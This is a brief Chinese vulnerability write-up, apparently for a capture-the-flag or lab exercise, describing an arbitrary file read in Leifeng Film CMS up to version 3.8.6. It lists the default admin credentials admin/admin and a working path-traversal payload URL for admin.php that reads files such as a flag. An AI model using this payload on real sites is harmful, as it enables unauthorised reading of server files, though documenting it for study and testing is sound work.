一、漏洞概述
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件。
二、影响范围
雷风影视CMS<= 3.8.6
三、访问页面
四、漏洞复现
1、登录后台,账号密码admin/admin
2、访问payload
/admin.php?s=/Template/edit/path/*web*..*..*..*..*..*..*flag